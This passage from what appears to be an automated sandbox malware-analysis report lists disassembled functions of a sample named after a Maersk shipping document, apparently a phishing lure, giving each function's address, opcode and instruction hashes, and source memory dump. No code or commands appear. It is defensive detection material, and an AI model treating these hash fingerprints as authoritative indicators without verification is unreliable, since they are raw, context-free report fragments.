                                                    • Opcode Fuzzy Hash: e616b13bd9c07154452c029759033d39b839e9e8efc4413494a39b0019cf673b
                                                    • Instruction Fuzzy Hash: 4941AE71A016098FCF14DF69D98099DFBF1BF8A320B2486AED466A7350D734A905CB41
                                                    Function 017B02E1 Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                    • Instruction ID: c448f58b39e2de12348e1e8cfdec361ee29cacf7c4255efb0d96131c70263b0a
                                                    • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                    • Instruction Fuzzy Hash: 37310531A05244AFDB128B68CC88BDBFBF9AF54350F0481A9F855D7396D7749984CBA0
                                                    Function 0184E3DB Relevance: .1, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e668a794386b75929c8df60cb3d29308f31d6c74dda5a4cfff1e140236ff2c94
                                                    • Instruction ID: aa4487b4f9d61a1f88b4c92cdd64df1614df2fa79e2e9f6601de66a85698d8af
                                                    • Opcode Fuzzy Hash: e668a794386b75929c8df60cb3d29308f31d6c74dda5a4cfff1e140236ff2c94
                                                    • Instruction Fuzzy Hash: 4F31763575071AABD7229FA58CC5FABB7A5BB58B54F000028F600EB295DEA8DD0187A0
                                                    Function 01854B4B Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5b923b1f6fa6587f23fcad3c711b501b54c7c6d66ace46df9d169b6d06aede17
                                                    • Instruction ID: d35867cca0180fc879c6e5f70571bf4368b4487f5802d62cf47da0fe343f4488
                                                    • Opcode Fuzzy Hash: 5b923b1f6fa6587f23fcad3c711b501b54c7c6d66ace46df9d169b6d06aede17
                                                    • Instruction Fuzzy Hash: 9331CF326052018FC321DF19D884E66B7F6FBC0364F1A446EE995DB255E731AE80CF91
                                                    Function 017A4260 Relevance: .1, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3fd58a9f93feddb6a14d37a42466f7d99d8fd13cfef9fec254b4ba26f3125968
                                                    • Instruction ID: 6caa5922d69a46558d42ba289feb70425d802bd4f3f393f6ffc6c3dc6c29728f
                                                    • Opcode Fuzzy Hash: 3fd58a9f93feddb6a14d37a42466f7d99d8fd13cfef9fec254b4ba26f3125968
                                                    • Instruction Fuzzy Hash: D841BD71200B09DFD763CF28C884BD6BBE9BF49354F048529E65ACB291C770E900CB90
                                                    Function 01854BB0 Relevance: .1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 89689c8641677630d1257deacc56b2d2b7ab984cba2808f230c5b7759dca425c
                                                    • Instruction ID: 8e2e825104361b65ca398e2407766801862dc6e10039fc1a6c90d653059516b0
                                                    • Opcode Fuzzy Hash: 89689c8641677630d1257deacc56b2d2b7ab984cba2808f230c5b7759dca425c
                                                    • Instruction Fuzzy Hash: 69319C716042019FD360DF28C880A2AB7E5FBC4724F19496DFD65DB295E730EE44CB92
                                                    Function 0181EB1D Relevance: .1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 63ffb35998522aa1724b195a7fbe298b3422edd56f446e7e2eaa1b41c7d5d1d6
                                                    • Instruction ID: 74e592b2d449648153858fb5c0320a2f1e35eaba738c333d4f5eaa5410a710a3
                                                    • Opcode Fuzzy Hash: 63ffb35998522aa1724b195a7fbe298b3422edd56f446e7e2eaa1b41c7d5d1d6
                                                    • Instruction Fuzzy Hash: 1131A0727016869BF3235B5CCD88F65BBDCBB40B44F1D04A0AE46EB6D5DB28DA80C221
                                                    Function 018661C3 Relevance: .1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ae6a3f440c62ba3d1e1cfc51e481a5a4415540edd67eb668728c2dfe414a4d2
                                                    • Instruction ID: 6966f9c6a5252774bedace0b7ec0b833a1913b80049dfc7d8b38b92eb5d11e11
                                                    • Opcode Fuzzy Hash: 3ae6a3f440c62ba3d1e1cfc51e481a5a4415540edd67eb668728c2dfe414a4d2
                                                    • Instruction Fuzzy Hash: 8B31B275A0015AABDB15DF98C884FAEB7B9FB48B40F554168E901EB344E770AE40CB94
                                                    Function 0184483A Relevance: .1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da38070620965b46a0f82883bf6f15be31593af66ab84491bb7748671ced683f
                                                    • Instruction ID: 6eb000f220b5e12cf47be026d9754a8a0bf1143b12d664c268a8739bbcd010d7
                                                    • Opcode Fuzzy Hash: da38070620965b46a0f82883bf6f15be31593af66ab84491bb7748671ced683f
                                                    • Instruction Fuzzy Hash: CF313376A4012DABCF21DF54DC88BDEBBF5AB98350F1401A5A508E7260DA309F919F90
                                                    Function 017CEB20 Relevance: .1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9fdb0683f9ef4cc6d1429ff5ec618e94de8635aadc844e3e85ad7f3c7638d14f
                                                    • Instruction ID: 619f1656e0b54067e146f82db90366e07e772fbaf2c1ffffe2930eb65bbbab15
                                                    • Opcode Fuzzy Hash: 9fdb0683f9ef4cc6d1429ff5ec618e94de8635aadc844e3e85ad7f3c7638d14f
                                                    • Instruction Fuzzy Hash: 6131B272A01219AFDB32DEA9CC40EAEFBF8EF44750F018469E915D7250D6709E008BA0
                                                    Function 018660B8 Relevance: .1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bd5da5f8eadab850b5e4be53cb22654cfd06f312f56bafcba632929006e4afdf
                                                    • Instruction ID: 831edc2528853fb5296912b5a8dfe61ce2d0f859ad08a58e1df9e57169d22073
                                                    • Opcode Fuzzy Hash: bd5da5f8eadab850b5e4be53cb22654cfd06f312f56bafcba632929006e4afdf
                                                    • Instruction Fuzzy Hash: A231C871700A46EFDB129FA9C890B6ABBBDAF44754F25406DE505EB342EB30DE018B90
                                                    Function 017A07AF Relevance: .1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6895a34577b9927be8569be76bb3a245c5478c84f3ef0f08b1c77a9df61f019b
                                                    • Instruction ID: fc4f3ea409adaf23aedd1b0917fb6cbcd956f24a6514af34e1babe2fc0987255
                                                    • Opcode Fuzzy Hash: 6895a34577b9927be8569be76bb3a245c5478c84f3ef0f08b1c77a9df61f019b
                                                    • Instruction Fuzzy Hash: B331F172A44202DBCB12DE288884A6BFBA5AFD4650F414A2DFD5597314DA30DC01CBE5
                                                    Function 017A8550 Relevance: .1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b0714c8d897922f2a24b460f72448b343fed8ec2b2e09fa83627477dda75671a
                                                    • Instruction ID: a411992acea8388e380c3d1b6f72ffb01db86b61e84414c8dc64f8d4047c0500
                                                    • Opcode Fuzzy Hash: b0714c8d897922f2a24b460f72448b343fed8ec2b2e09fa83627477dda75671a
                                                    • Instruction Fuzzy Hash: 8C319E716053018FE761CF19C848B2AFBE6FB88700F544A6DE984DB391D7B0E944CB92
                                                    Function 017DA6C7 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                    • Instruction ID: 55957e749cd97b6429a4102f4131732484dee991ea324a8b8c4fe1d06bb950ed
                                                    • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                    • Instruction Fuzzy Hash: 52312AB2B00B05AFD761CF69CD40B57BBF8BB08B60F15096DA59AC3651E670E9008B60
                                                    Function 0184EBD0 Relevance: .1, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c076737cada405ce2355904bfd1d1c5d756fd96c1044e299879216d18cbe60c4
                                                    • Instruction ID: 23fa8c12a0bc8480d24053063301aa245b611a55ab81abdf8b62d726a921530e
                                                    • Opcode Fuzzy Hash: c076737cada405ce2355904bfd1d1c5d756fd96c1044e299879216d18cbe60c4
                                                    • Instruction Fuzzy Hash: D931C9B15053068FCB10DF19C48095ABBF1FF89314F0849AEE488DB312E735EA44CB96
                                                    Function 017C438F Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ff1679991c7d656425ae287e806c74da59451a743c947ee46a7ab03e06b9052
                                                    • Instruction ID: 6357d6eb270f2a91d83a620e2d4f250b65cb0b07a9378d98597da3db8004e080
                                                    • Opcode Fuzzy Hash: 0ff1679991c7d656425ae287e806c74da59451a743c947ee46a7ab03e06b9052
                                                    • Instruction Fuzzy Hash: F731E471B002059FD720DFA8CC94A6EFBF9AB94B04F20842DD516D7294D730DA41CB50
                                                    Function 0179CB7E Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                    • Instruction ID: f840d41fb95fe3930e2e805c67dc9b334f9344d8f0241842edf8ec8306402caa
                                                    • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                    • Instruction Fuzzy Hash: 7B210636E4025AAADF11DBB98841BAFFBB5EF15740F0580799F19EB340E270D90487A0
                                                    Function 0179C156 Relevance: .1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 13454f8a376007b4d28473045bf5c91735927f303ef67aa2edc00f0e4d43d921
                                                    • Instruction ID: 47859b19e0f3e1ec4b8b0c28d2d407d4f926fa510156c0b31fac4d625d755b1d
                                                    • Opcode Fuzzy Hash: 13454f8a376007b4d28473045bf5c91735927f303ef67aa2edc00f0e4d43d921
                                                    • Instruction Fuzzy Hash: D3313BB25002018BDB31AF5CCC85BAAFBB4EF51314F5481ADEA459F346EB34D985CBA0
                                                    Function 0185C3CD Relevance: .1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                    • Instruction ID: f17dc9f30ac5f6195093cd64b1693ff7227445f12aacc4205c180b4fd469862b
                                                    • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                    • Instruction Fuzzy Hash: F1212D3660075666CF15AB99C844EBAFFB8EF40714F40841AFE95CB591E734DA40C761
                                                    Function 0179E420 Relevance: .1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a343fd97bde3c866fb79c6f5699296084139490d5097401ccde55732a0bf75ac
                                                    • Instruction ID: 1a9a50f867323c214781afc0847934e7ef8d36f76404b36a961eb5da3c98240f
                                                    • Opcode Fuzzy Hash: a343fd97bde3c866fb79c6f5699296084139490d5097401ccde55732a0bf75ac
                                                    • Instruction Fuzzy Hash: BB31D431A0152CABDF31DB18DC85FEEF7B9AB15740F0101A1F645A72A0DA74AE848F90
                                                    Function 017D4588 Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                    • Instruction ID: dfd08e9f4ae59979ec7868df03b0cdf58cbd20c2858de5497defdde3b054ae27
                                                    • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                    • Instruction Fuzzy Hash: A3216D72A00609EBCB15CF58C984A8AFBB5FF48714F108069EE179B685D671EA058B90
                                                    Function 017D44B0 Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b5fb45270eb66ee9cbc363da760ad45e27bc11fa5302e793df8acd74147295a
                                                    • Instruction ID: a0e2ccb127f626f976b24aad3cc4268fca4573e05aba4480e924ab77b60dafee
                                                    • Opcode Fuzzy Hash: 9b5fb45270eb66ee9cbc363da760ad45e27bc11fa5302e793df8acd74147295a
                                                    • Instruction Fuzzy Hash: 5821C3726047499BCB21CF18C880B6BB7F4FF88760F504529FD569BA45D730EA008FA2
                                                    Function 0179E388 Relevance: .1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                    • Instruction ID: fdaba4b0ef3c2a31809c702bbb1134f3321a418fafaad3c3a0d6abfc19f7ab67
                                                    • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                    • Instruction Fuzzy Hash: 97318931600605EFEB21CFA8D884F6AB7F9EF45354F1445A9E652CB290EB30EE45CB50
                                                    Function 0181E609 Relevance: .1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 004a2478b737d71d914090d391e6c41b728a2a984acb56b740d6b8547539bd05
                                                    • Instruction ID: 0633480eed3b87be57a8ef2646822a9e7b6172851f0a8fb7400e27ee3dac900a
                                                    • Opcode Fuzzy Hash: 004a2478b737d71d914090d391e6c41b728a2a984acb56b740d6b8547539bd05
                                                    • Instruction Fuzzy Hash: E6316B76A00205DFCB19CF18C884DAEB7B9EF84304F554859EC09DB399E731AA40CB90
                                                    Function 018206F1 Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e87bee8b69e933480e1eab99e68de6a00a5de489fe846fe563251e69cda3f6f0
                                                    • Instruction ID: 4bcea0d2e0ba3e1b5dadd6ff4287a8ecb4a35dd63ce594c271a5263dc70a3478
                                                    • Opcode Fuzzy Hash: e87bee8b69e933480e1eab99e68de6a00a5de489fe846fe563251e69cda3f6f0
                                                    • Instruction Fuzzy Hash: F1217C71900229AFCF21DF59C881ABEB7F4FF48740B544069F941EB254D739AE42CBA1
                                                    Function 0182019F Relevance: .1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9bccb90fd115743a2d0cd4c1be52982a8400b2b84b73c089ca59c510ccedabc2
                                                    • Instruction ID: 5984efb8ce823a05a072f01376a4ba4551097698713b0813607efc50080ede6c
                                                    • Opcode Fuzzy Hash: 9bccb90fd115743a2d0cd4c1be52982a8400b2b84b73c089ca59c510ccedabc2
                                                    • Instruction Fuzzy Hash: B2218B71600655AFD716DB68C884F6AB7A8FF48740F14006AF944DB6A1D734EE80CB68
                                                    Function 01820283 Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac17a7efe734335b2f588e5d16486c2e8178821772f50bf3c01dbb553d973b3f
                                                    • Instruction ID: f27bc3d32595e2d2a28f2afdfe7bd477ab87e2203f4179c5a27d0cc761d63a4c
                                                    • Opcode Fuzzy Hash: ac17a7efe734335b2f588e5d16486c2e8178821772f50bf3c01dbb553d973b3f
                                                    • Instruction Fuzzy Hash: 1721C1725042569FD712DF59C888B9BFBECEF95740F08045AFD80C7251D730CA84C6A2
                                                    Function 017C2835 Relevance: .1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 64b7fd431aa13bef9a2c239d72247e57f36de967e091525d4f1e205a88232335
                                                    • Instruction ID: 6abd9ae981982575b3e2aa8edd59aa3f3dce5ea437b666cecfcc2bbf6956d152
                                                    • Opcode Fuzzy Hash: 64b7fd431aa13bef9a2c239d72247e57f36de967e091525d4f1e205a88232335
                                                    • Instruction Fuzzy Hash: D12107316457859BF327672CCD48B25BBD4AF41F64F1803A8FA20DB6E2D768C9818210
                                                    Function 017DA30B Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3657cd1bfad9a172248a19f73b8d4b13ccae794f6a488d2f1e0cf6b3f2c8ec38
                                                    • Instruction ID: 552b5d4620c05023ef3f69004a553e63fb0f690bdb8ee32e6edc24b90431ce9a
                                                    • Opcode Fuzzy Hash: 3657cd1bfad9a172248a19f73b8d4b13ccae794f6a488d2f1e0cf6b3f2c8ec38
                                                    • Instruction Fuzzy Hash: 9F21AC352007019FCB25DF29C940B46B7F6BF08704F248468A549CB765E771E942CB94
                                                    Function 0185A49A Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a1196dad2aa46e8144d7a9a7bc2cf82e262eeb4ee47bea4c1604a058926d8c7d
                                                    • Instruction ID: 3f1e1a35733c18ab4b483043ec73ccc482a82168fb58c75609fadfe6d8a29c5f
                                                    • Opcode Fuzzy Hash: a1196dad2aa46e8144d7a9a7bc2cf82e262eeb4ee47bea4c1604a058926d8c7d
                                                    • Instruction Fuzzy Hash: AA115C36380A11BFD36659989CC4F27BA99DBD4B74F504229BF08CB281DB70DD008796
                                                    Function 01820946 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7997263e3c2392f80933070bfba970d32d44c4261598425adeaa481e3fb3dc18
                                                    • Instruction ID: 0924343abb96f985c46ba5bf48877c3759afe74fc596101afc524fc73cfc05da
                                                    • Opcode Fuzzy Hash: 7997263e3c2392f80933070bfba970d32d44c4261598425adeaa481e3fb3dc18
                                                    • Instruction Fuzzy Hash: 3021F8B1E40219ABCB20DFAAD8849AEFBF8BF98700F10012EE405E7344D6709A45CB50
                                                    Function 018380A8 Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                    • Instruction ID: ff8d70cd646917cf6ee1185738f36bef9aa65b75f2d9fb5fa91b014927f00e1b
                                                    • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                    • Instruction Fuzzy Hash: 7F218C72A0020AEFDF129F98CC44BAEBBB9EF89310F244819F910E7251D774DA509B90
                                                    Function 017D0124 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
